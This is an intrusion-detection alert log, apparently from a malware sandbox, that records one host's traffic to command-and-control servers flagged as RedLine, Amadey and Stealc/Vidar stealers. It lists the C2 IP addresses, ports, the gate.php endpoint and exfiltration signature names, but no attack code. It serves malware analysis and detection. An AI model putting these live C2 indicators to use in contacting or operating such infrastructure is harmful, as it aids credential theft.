2024-12-12T16:48:39.209260+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	49943	185.81.68.147	80	TCP
2024-12-12T16:48:39.209260+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	49943	185.81.68.147	80	TCP
2024-12-12T16:48:42.321382+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.10	49946	185.81.68.147	80	TCP
2024-12-12T16:48:44.289301+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49951	185.215.113.43	80	TCP
2024-12-12T16:48:45.752757+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49957	185.215.113.16	80	TCP
2024-12-12T16:48:51.420975+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49970	185.215.113.43	80	TCP
2024-12-12T16:48:53.217233+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49975	185.215.113.16	80	TCP
2024-12-12T16:48:55.965003+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.10	49983	185.81.68.147	80	TCP
2024-12-12T16:48:56.281784+0100	2001046	ET MALWARE UPX compressed file download possible malware	3	185.81.68.147	80	192.168.2.10	49983	TCP
2024-12-12T16:48:57.323492+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:48:57.323492+0100	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:48:57.758591+0100	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	185.81.68.147	1912	192.168.2.10	49987	TCP
2024-12-12T16:48:57.805054+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	49989	185.81.68.147	80	TCP
2024-12-12T16:48:57.805054+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	49989	185.81.68.147	80	TCP
2024-12-12T16:48:57.805054+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	49989	185.81.68.147	80	TCP
2024-12-12T16:48:58.053827+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	49996	185.81.68.147	80	TCP
2024-12-12T16:48:58.053827+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	49996	185.81.68.147	80	TCP
2024-12-12T16:48:58.053827+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	49996	185.81.68.147	80	TCP
2024-12-12T16:49:00.539654+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	49998	185.81.68.147	80	TCP
2024-12-12T16:49:00.539654+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	49998	185.81.68.147	80	TCP
2024-12-12T16:49:00.539654+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	49998	185.81.68.147	80	TCP
2024-12-12T16:49:00.649649+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49999	185.215.113.43	80	TCP
2024-12-12T16:49:00.782649+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50008	185.81.68.147	80	TCP
2024-12-12T16:49:00.782649+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50008	185.81.68.147	80	TCP
2024-12-12T16:49:00.782649+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50008	185.81.68.147	80	TCP
2024-12-12T16:49:01.392290+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50011	185.81.68.147	80	TCP
2024-12-12T16:49:01.392290+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50011	185.81.68.147	80	TCP
2024-12-12T16:49:01.392290+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50011	185.81.68.147	80	TCP
2024-12-12T16:49:02.146006+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	50010	185.215.113.16	80	TCP
2024-12-12T16:49:02.860674+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:03.271064+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50017	185.81.68.147	80	TCP
2024-12-12T16:49:03.271064+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50017	185.81.68.147	80	TCP
2024-12-12T16:49:03.271064+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50017	185.81.68.147	80	TCP
2024-12-12T16:49:03.298149+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.81.68.147	1912	192.168.2.10	49987	TCP
2024-12-12T16:49:03.835156+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:04.588176+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:05.207591+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50021	185.81.68.147	80	TCP
2024-12-12T16:49:05.207591+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50021	185.81.68.147	80	TCP
2024-12-12T16:49:05.207591+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50021	185.81.68.147	80	TCP
2024-12-12T16:49:05.941811+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:06.524367+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:07.098867+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:07.246330+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50030	185.81.68.147	80	TCP
2024-12-12T16:49:07.246330+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50030	185.81.68.147	80	TCP
2024-12-12T16:49:07.246330+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50030	185.81.68.147	80	TCP
2024-12-12T16:49:07.724825+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:49:08.248085+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:49:08.701832+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.10	50024	TCP
2024-12-12T16:49:08.908525+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50034	185.81.68.147	80	TCP
2024-12-12T16:49:08.908525+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50034	185.81.68.147	80	TCP
2024-12-12T16:49:08.908525+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50034	185.81.68.147	80	TCP
2024-12-12T16:49:09.021402+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:49:09.219283+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.10	50024	TCP
2024-12-12T16:49:09.311065+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:09.751202+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:10.283805+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:10.575372+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	50035	185.215.113.43	80	TCP
2024-12-12T16:49:10.669752+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:49:10.703399+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50036	185.81.68.147	80	TCP
2024-12-12T16:49:10.703399+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50036	185.81.68.147	80	TCP
2024-12-12T16:49:10.703399+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50036	185.81.68.147	80	TCP
2024-12-12T16:49:10.734934+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:11.728022+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:12.076552+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:49:12.109274+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	50037	31.41.244.11	80	TCP
2024-12-12T16:49:12.169561+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:12.607750+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:12.687511+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50038	185.81.68.147	80	TCP
2024-12-12T16:49:12.687511+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50038	185.81.68.147	80	TCP
2024-12-12T16:49:12.687511+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50038	185.81.68.147	80	TCP
2024-12-12T16:49:13.048307+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:13.603022+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:13.758647+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:14.210076+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:14.392460+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50040	185.81.68.147	80	TCP
2024-12-12T16:49:14.392460+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50040	185.81.68.147	80	TCP
2024-12-12T16:49:14.392460+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50040	185.81.68.147	80	TCP
2024-12-12T16:49:14.648312+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:14.712528+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	50039	31.41.244.11	80	TCP
2024-12-12T16:49:15.084665+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:15.555208+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:16.046870+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50041	185.81.68.147	80	TCP
2024-12-12T16:49:16.046870+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50041	185.81.68.147	80	TCP
2024-12-12T16:49:16.046870+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50041	185.81.68.147	80	TCP
2024-12-12T16:49:16.095366+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:16.215903+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:17.575686+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:17.891832+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50043	185.81.68.147	80	TCP
2024-12-12T16:49:17.891832+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50043	185.81.68.147	80	TCP
2024-12-12T16:49:17.891832+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50043	185.81.68.147	80	TCP
2024-12-12T16:49:18.012627+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:18.518179+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:19.946252+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50045	185.81.68.147	80	TCP
2024-12-12T16:49:19.946252+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50045	185.81.68.147	80	TCP
2024-12-12T16:49:19.946252+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50045	185.81.68.147	80	TCP
2024-12-12T16:49:22.019394+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50048	185.81.68.147	80	TCP
2024-12-12T16:49:22.019394+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50048	185.81.68.147	80	TCP
2024-12-12T16:49:22.019394+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50048	185.81.68.147	80	TCP
2024-12-12T16:49:22.815800+0100	2044623	ET MALWARE Amadey Bot Activity (POST)	1	192.168.2.10	50047	185.215.113.43	80	TCP
2024-12-12T16:49:23.947453+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50050	185.81.68.147	80	TCP
2024-12-12T16:49:23.947453+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50050	185.81.68.147	80	TCP
2024-12-12T16:49:23.947453+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50050	185.81.68.147	80	TCP
2024-12-12T16:49:24.329585+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	50049	31.41.244.11	80	TCP
2024-12-12T16:49:25.845097+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50060	185.81.68.147	80	TCP
2024-12-12T16:49:25.845097+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50060	185.81.68.147	80	TCP
2024-12-12T16:49:25.845097+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50060	185.81.68.147	80	TCP
2024-12-12T16:49:27.692012+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50061	185.81.68.147	80	TCP
2024-12-12T16:49:27.692012+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50061	185.81.68.147	80	TCP
2024-12-12T16:49:27.692012+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50061	185.81.68.147	80	TCP
2024-12-12T16:49:29.345278+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	50063	185.215.113.43	80	TCP
2024-12-12T16:49:29.585615+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50064	185.81.68.147	80	TCP
2024-12-12T16:49:29.585615+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50064	185.81.68.147	80	TCP
2024-12-12T16:49:29.585615+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50064	185.81.68.147	80	TCP
2024-12-12T16:49:30.848414+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	50065	31.41.244.11	80	TCP
2024-12-12T16:49:32.035333+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50067	185.81.68.147	80	TCP
2024-12-12T16:49:32.035333+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50067	185.81.68.147	80	TCP
2024-12-12T16:49:32.035333+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50067	185.81.68.147	80	TCP
2024-12-12T16:49:32.277224+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50068	185.81.68.147	80	TCP
2024-12-12T16:49:32.277224+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50068	185.81.68.147	80	TCP
2024-12-12T16:49:32.277224+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50068	185.81.68.147	80	TCP
2024-12-12T16:49:32.570048+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50070	185.81.68.147	80	TCP
2024-12-12T16:49:32.570048+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50070	185.81.68.147	80	TCP
2024-12-12T16:49:32.570048+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50070	185.81.68.147	80	TCP
2024-12-12T16:49:34.388673+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50071	185.81.68.147	80	TCP
2024-12-12T16:49:34.388673+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50071	185.81.68.147	80	TCP
2024-12-12T16:49:34.388673+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50071	185.81.68.147	80	TCP
2024-12-12T16:49:36.018645+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50072	185.81.68.147	80	TCP
2024-12-12T16:49:36.018645+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50072	185.81.68.147	80	TCP
2024-12-12T16:49:36.018645+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50072	185.81.68.147	80	TCP
2024-12-12T16:49:36.259903+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50075	185.81.68.147	80	TCP
2024-12-12T16:49:36.259903+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50075	185.81.68.147	80	TCP
2024-12-12T16:49:36.259903+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50075	185.81.68.147	80	TCP
2024-12-12T16:49:36.271923+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50076	185.81.68.147	80	TCP
2024-12-12T16:49:36.271923+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50076	185.81.68.147	80	TCP
2024-12-12T16:49:36.271923+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50076	185.81.68.147	80	TCP
2024-12-12T16:49:38.318334+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50080	185.81.68.147	80	TCP
2024-12-12T16:49:38.318334+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50080	185.81.68.147	80	TCP
2024-12-12T16:49:38.318334+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50080	185.81.68.147	80	TCP
2024-12-12T16:49:39.185191+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	50078	185.215.113.43	80	TCP
2024-12-12T16:49:40.059485+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.10	50079	116.203.10.31	443	TCP
2024-12-12T16:49:40.059724+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.10.31	443	192.168.2.10	50079	TCP
2024-12-12T16:49:40.224291+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50085	185.81.68.147	80	TCP
2024-12-12T16:49:40.224291+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50085	185.81.68.147	80	TCP
2024-12-12T16:49:40.224291+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50085	185.81.68.147	80	TCP
2024-12-12T16:49:42.123906+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50091	185.81.68.147	80	TCP
2024-12-12T16:49:42.123906+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50091	185.81.68.147	80	TCP
2024-12-12T16:49:42.123906+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50091	185.81.68.147	80	TCP
2024-12-12T16:49:42.846309+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.10.31	443	192.168.2.10	50088	TCP
2024-12-12T16:49:43.896529+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50104	185.81.68.147	80	TCP
2024-12-12T16:49:43.896529+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50104	185.81.68.147	80	TCP
2024-12-12T16:49:43.896529+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50104	185.81.68.147	80	TCP
2024-12-12T16:49:44.305053+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:45.761525+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50120	185.81.68.147	80	TCP
2024-12-12T16:49:45.761525+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50120	185.81.68.147	80	TCP
2024-12-12T16:49:45.761525+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50120	185.81.68.147	80	TCP
2024-12-12T16:49:46.315458+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:47.592431+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50124	185.81.68.147	80	TCP
2024-12-12T16:49:47.592431+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50124	185.81.68.147	80	TCP
2024-12-12T16:49:47.592431+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50124	185.81.68.147	80	TCP
2024-12-12T16:49:48.646766+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:49.279394+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50127	185.81.68.147	80	TCP
2024-12-12T16:49:49.279394+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50127	185.81.68.147	80	TCP
2024-12-12T16:49:49.279394+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50127	185.81.68.147	80	TCP
2024-12-12T16:49:50.303983+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:51.229821+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50128	185.81.68.147	80	TCP
2024-12-12T16:49:51.229821+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50128	185.81.68.147	80	TCP
2024-12-12T16:49:51.229821+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50128	185.81.68.147	80	TCP
2024-12-12T16:49:53.073352+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50131	185.81.68.147	80	TCP
2024-12-12T16:49:53.073352+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50131	185.81.68.147	80	TCP
2024-12-12T16:49:53.073352+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50131	185.81.68.147	80	TCP
2024-12-12T16:49:55.009969+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50134	185.81.68.147	80	TCP
2024-12-12T16:49:55.009969+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50134	185.81.68.147	80	TCP
2024-12-12T16:49:55.009969+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50134	185.81.68.147	80	TCP
2024-12-12T16:49:55.712604+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:56.698622+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50136	185.81.68.147	80	TCP
2024-12-12T16:49:56.698622+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50136	185.81.68.147	80	TCP
2024-12-12T16:49:56.698622+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50136	185.81.68.147	80	TCP
2024-12-12T16:49:56.940429+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:58.579931+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50139	185.81.68.147	80	TCP
2024-12-12T16:49:58.579931+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50139	185.81.68.147	80	TCP
2024-12-12T16:49:58.579931+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50139	185.81.68.147	80	TCP
2024-12-12T16:50:00.279337+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50141	185.81.68.147	80	TCP
2024-12-12T16:50:00.279337+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50141	185.81.68.147	80	TCP
2024-12-12T16:50:00.279337+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50141	185.81.68.147	80	TCP
2024-12-12T16:50:02.307286+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50146	185.81.68.147	80	TCP
2024-12-12T16:50:02.307286+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50146	185.81.68.147	80	TCP
2024-12-12T16:50:02.307286+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50146	185.81.68.147	80	TCP
2024-12-12T16:50:04.012827+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50148	185.81.68.147	80	TCP
2024-12-12T16:50:04.012827+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50148	185.81.68.147	80	TCP
2024-12-12T16:50:04.012827+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50148	185.81.68.147	80	TCP
2024-12-12T16:50:04.214882+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	50147	185.81.68.147	80	TCP
2024-12-12T16:50:04.214882+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	50147	185.81.68.147	80	TCP
2024-12-12T16:50:04.214882+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	50147	185.81.68.147	80	TCP
